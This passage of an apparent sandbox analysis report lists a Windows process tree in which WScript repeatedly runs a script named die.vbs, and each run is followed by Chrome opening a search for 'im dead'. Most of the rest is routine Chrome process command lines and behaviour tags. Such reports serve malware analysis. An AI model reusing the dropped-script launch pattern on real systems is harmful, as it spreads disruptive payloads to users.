        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3864 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:2924
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2944 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:1492
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3816 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:3164
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2616 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:3380
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4336 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:3408
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4048 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:3724
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4612 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:3760
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4476 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:3932
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5192 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:3956
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4236 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:3860
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=2856 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:3872
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5584 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:3288
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5800 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:2932
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=5924 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:4268
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:2752
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:2748
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:2696
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:1860
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:1296
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:2368
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:524
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:2224
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:2948
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:3056
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:2456
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:3092
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:3100
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:3328
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:3352
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:3344
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:3588
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:3668
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:3656
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:3876
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:3900
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:3888
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:1540
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:3340
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:3420
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:2740
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:1608
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:1680
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:4136
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:4160
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:4148
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:5016
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:5040
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:2
        5⤵
        
        PID:4252
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:8
        5⤵
        
        PID:1128
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1592 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:8
        5⤵
        
        PID:4332
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2288 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:4536
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2296 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:4544
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2844 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:4688
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:2
        5⤵
        
        PID:3324
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3300 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:2856
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3584 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:2532
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=2796 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:2192
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2492 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:4084
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3872 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:3508
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2324 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:2228
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2348 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:2156
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2304 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:4952
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4300 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:2140
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4432 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:1740
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4572 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:2028
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2936 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:5112
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4752 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:4444
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4692 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:2624
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4696 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:4596
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5656 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:1
        5⤵
        
        PID:3448
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1180,i,15800128411831936944,8199608181218855713,131072 /prefetch:8
        5⤵
        
        PID:2744
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:5028
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:4632
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:4648
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:4668
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:4808
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
